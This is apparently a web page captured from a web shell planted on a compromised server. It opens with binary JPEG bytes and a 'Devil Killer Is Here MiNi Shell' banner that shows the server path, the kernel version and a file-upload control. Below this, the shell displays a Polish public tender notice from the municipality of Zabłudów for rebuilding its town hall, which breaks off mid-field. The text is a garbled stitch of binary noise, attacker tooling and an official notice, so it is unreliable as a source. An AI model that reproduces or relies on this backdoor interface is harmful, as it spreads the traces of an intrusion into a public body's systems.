JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240612/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240612/0036345401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Urząd przyjazny mieszkańcom” - przebudowa i rozbudowa budynku admin. – biuro. – UM w Zabłudowie w formule zaprojektuj i wybuduj w ramach Rządowego Funduszu Polski Ład: Program Inwest. Strategicznych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ZABŁUDÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659208</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zabłudów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">16-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@zabludow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip-umzabludow.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Urząd przyjazny mieszkańcom” - przebudowa i rozbudowa budynku admin. – biuro. – UM w Zabłudowie w formule zaprojektuj i wybuduj w ramach Rządowego Funduszu Polski Ład: Program Inwest. Strategicznych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d21346a2-2720-11ef-a458-c2a7c3d67e03</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00363454</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00074941/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Przebudowa wraz z rozbudową budynku Urzędu Miejskiego w Zabłudowie w ramach Rządowego Funduszu Polski Ład - zadanie pn &#34;Urząd przyjazny mieszkańcom&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d21346a2-2720-11ef-a458-c2a7c3d67e03 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl, https://bip-umzabludow.wrotapodlasia.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w Pzp, odbywa się przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>2. Oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej. Zamawiający preferuje formaty danych: .txt, .rtf, .pdf, .doc, .docx, .odt, .xls.<br/>3. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip albo .7Z. Jeśli Wykonawca pakuje dokumenty np. w plik ZIP, Zamawiający zaleca wcześniejsze podpisanie każdego ze skompresowanych plików.<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień i zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>5. W przypadku załączników, które są zgodnie z ustawą Pzp lub Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>7. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>8. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: um@zabludow.pl (nie dotyczy składania ofert).<br/>9. Pytania do SWZ można również zadawać drogą mailową, na adres um@zabludow.pl (ze wskazaniem w tytule wiadomości numeru/nazwy postępowania).<br/>10. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>11. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>12. Zamawiający zastrzega, iż wszelkie dokumenty i oświadczenia Zamawiającego kierowane do Wykonawców będą przekazywane w formie dokumentowej. W szczególności wskazuje się, iż wszelkie wyjaśnienia, zawiadomienia, wezwania, informacje, itp. pochodzące od Zamawiającego będą w toku postępowania przekazywane Wykonawcom drogą elektroniczną w postaci skanów (elektronicznych kopii dokumentów w oryginale posiadających papierową) lub elektronicznych kopii dokumentów (np. w formacie WORD lub PDF) zawierających informację o właściwym podpisaniu ich oryginałów. Zamawiający nie przewiduje przekazywania sporządzanych dokumentów i oświadczeń w postaci elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Burmistrz Zabłudowa informuje, że: <br/>1.	Administratorem Pana/Pani danych osobowych jest Burmistrz Zabłudowa z siedzibą w Zabłudowie, ul. Rynek 8, 16-060 Zabłudów. <br/>2.	Kontakt do Inspektora ochrony danych w Urzędzie Miejskim w Zabłudowie: <br/>•	e-mail: iod@zabludow.pl <br/>•	pocztą: Inspektor Ochrony Danych, Urząd Miejski w Zabłudowie, ul. Rynek 8, 16-060 Zabłudów <br/>•	przez platformę ePUAP: https://pz.gov.pl/pz/index <br/>•	przez Cyfrowy Urząd: https://cu.wrotapodlasia.pl/CU.Public/KUP/Unit/Info/10014 <br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na <br/>4.	„Urząd przyjazny mieszkańcom” inwestycja polegająca na przebudowie i rozbudowie budynku administracyjno biurowego – urzędu miejskiego w Zabłudowie wraz z niezbędnym wyposażeniem i zagospodarowaniem terenu w formule zaprojektuj i wybuduj w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych” – znak postępowania ZP.271.10.2024 prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. 2023 r. poz 1605 z późn. zm.) <br/>5.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 Pzp oraz ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej (t.j. Dz. U. z 2020 r. poz. 2176). Ponadto Pani/Pana dane osobowe będą opublikowane na stronie internetowej i w Biuletynie Informacji Publicznej Urzędu Miejskiego w Zabłudowie, jeśli taki obowiązek będzie wynikał z Pzp. <br/>(Uwaga: Organy publiczne, które mogą otrzymywać Pani/Pana dane osobowe w ramach konkretnego postępowania zgodnie z prawem Unii lub prawem państwa członkowskiego, nie są uznawane za odbiorców). <br/>6.	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego. <br/>7.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>8.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>9.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. <br/>10.	Posiada Pani/Pan: <br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ; <br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: <br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. <br/>c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1: Zaprojektowanie i wykonanie robót budowlanych określonych w Programie Funkcjonalno-Użytkowym jako „Urząd przyjazny mieszkańcom” jako inwestycja polegajaca na przebudowie i rozbudowie budynku administracyjno biurowego – urzędu miejskiego w Zabłudowie wraz z niezbędnym wyposażeniem i zagospodarowaniem terenu w formule zaprojektuj i wybuduj w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.” W ramach zadania Zamawiający wymaga opracowania dokumentacji projektowo-kosztorysowej oraz Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych, w zakresie zgodnym z wymaganiami określonymi w Programie Funkcjonalno – Użytkowym (zwanym dalej „PFU”) wraz ze wszystkimi opracowaniami branżowymi, z uzyskaniem wymaganych prawem decyzji, pozwoleń, opinii, warunków, uzgodnień jak również innych dokumentów niezbędnych do uzyskania prawomocnego pozwolenia na realizację zadania budowlanego wraz z uzyskaniem tego pozwolenia na podstawie stosownego pełnomocnictwa. Wykonania z należytą starannością robót budowlanych dalej zwanych „robotami” lub „robotami budowlanymi” na podstawie zaakceptowanej przez Zamawiającego dokumentacji projektowej, następnie zatwierdzonej decyzją o pozwoleniu na budowę przez organ administracji architektonicznej zgodnie z zasadami wiedzy technicznej normami oraz z poszanowaniem postanowień zawartych w uzyskanych decyzjach, pozwoleniach, warunkach, opiniach i uzgodnieniach oraz innych dokumentach, mających związek z procesem budowlanym dla realizowanych robót wraz ze sprawowaniem nadzoru autorskiego w okresie wykonywania robót budowlanych na podstawie opracowanej dokumentacji projektowej, zakończone przygotowaniem dokumentacji powykonawczej wraz z instrukcją użytkowania obiektu oraz listą serwisową zamontowanych urządzeń oraz czynnym wsparciem dla Zamawiającego w celu uzyskania przez Zamawiającego decyzji pozwolenia na użytkowanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71500000-3 - Usługi związane z budownictwem</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny w zakresie Zadania 1: <br/>1)	Cena – waga kryterium: 60% <br/>Oferta najtańsza otrzyma 60 pkt. Pozostałe proporcjonalnie mniej, według formuły: <br/>Cn / Cb x 100 x 60% = liczba punktów Gdzie: <br/>Cn – najniższa cena spośród ofert nieodrzuconych <br/>Cb- cena oferty rozpatrywanej <br/>100- wskaźnik stały <br/>60 % - procentowe znaczenie kryterium cena <br/>2)	Okres gwarancji jakości – waga kryterium: 40% <br/>Minimalny okres gwarancji jakości wynosi 5 lat. Oferty z okresem gwarancji jakości wynoszącym mniej niż 5 lat podlegają odrzuceniu. Oferowana gwarancja jakości musi być wyrażona w pełnych latach. Oferty otrzymują poniżej przedstawioną ilość punktów z tytułu oferowanych okresów gwarancji jakości: <br/>-	5 lata gwarancji jakości – 0 pkt, <br/>-	6 lata gwarancji jakości – 20 pkt, <br/>-	co najmniej 7 lat gwarancji jakości – 40 pkt. <br/>Okres gwarancji jakości należy wpisać w formularzu ofertowym. <br/> <br/>2. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów według wzoru: S = C + P Gdzie: <br/>S – suma punktów przyznana ofercie, <br/>C – ilość punktów przyznana ofercie w kryterium cena, <br/>P – ilość punktów przyznana ofercie w kryterium okres gwarancji jakości.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2: Pełnienie wielobranżowego nadzoru inwestorskiego nad prawidłowością realizacji zadania pn. „Urząd przyjazny mieszkańcom” inwestycja polegająca na przebudowie i rozbudowie budynku administracyjno biurowego – urzędu miejskiego w Zabłudowie wraz z niezbędnym wyposażeniem i zagospodarowaniem terenu w formule zaprojektuj i wybuduj w ramach Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.”, w szczególności nad wykonaniem dokumentacji projektowej oraz robotami budowlanym wykonywanymi na jej podstawie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71521000-6 - Usługi nadzorowania placu budowy</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny w zakresie Zadania 2: <br/>1)	Cena – waga kryterium 60% <br/>Oferta najtańsza otrzyma 60 pkt. Pozostałe proporcjonalnie mniej, według formuły: <br/>Cn / Cb x 100 x 60% = liczba punktów Gdzie: <br/>Cn – najniższa cena spośród ofert nieodrzuconych <br/>Cb- cena oferty rozpatrywanej <br/>100- wskaźnik stały <br/>60 % - procentowe znaczenie kryterium cena <br/>2)	Czas reakcji – 40%, <br/>Czas reakcji to czas stawienia się Wykonawcy na placu budowy lub w siedzibie Zamawiającego na wezwanie Zamawiającego. Oferowany czas reakcji musi być wyrażony w pełnych godzinach, przy czym nie może być dłuższy niż 24 godziny od momentu wezwania przez Zamawiającego do stawienia się na placu budowy lub w siedzibie Zamawiającego. Oferta z czasem reakcji dłuższym niż 24 godziny podlega odrzuceniu. <br/>Ilości punktów przyznawane ofertom: do 24 godzin – 0 pkt, <br/>do 12 godzin – 20 pkt,<br/> do 6 godzin – 40 pkt. <br/> Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą sumę punktów poszczególnych kryteriów (S), według wzoru: S = C+ K gdzie: <br/>S – suma punktów przyznana ofercie, <br/>C – ilość punktów przyznana ofercie w kryterium cena, <br/>P – ilość punktów przyznana ofercie w kryterium czas reakcji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj 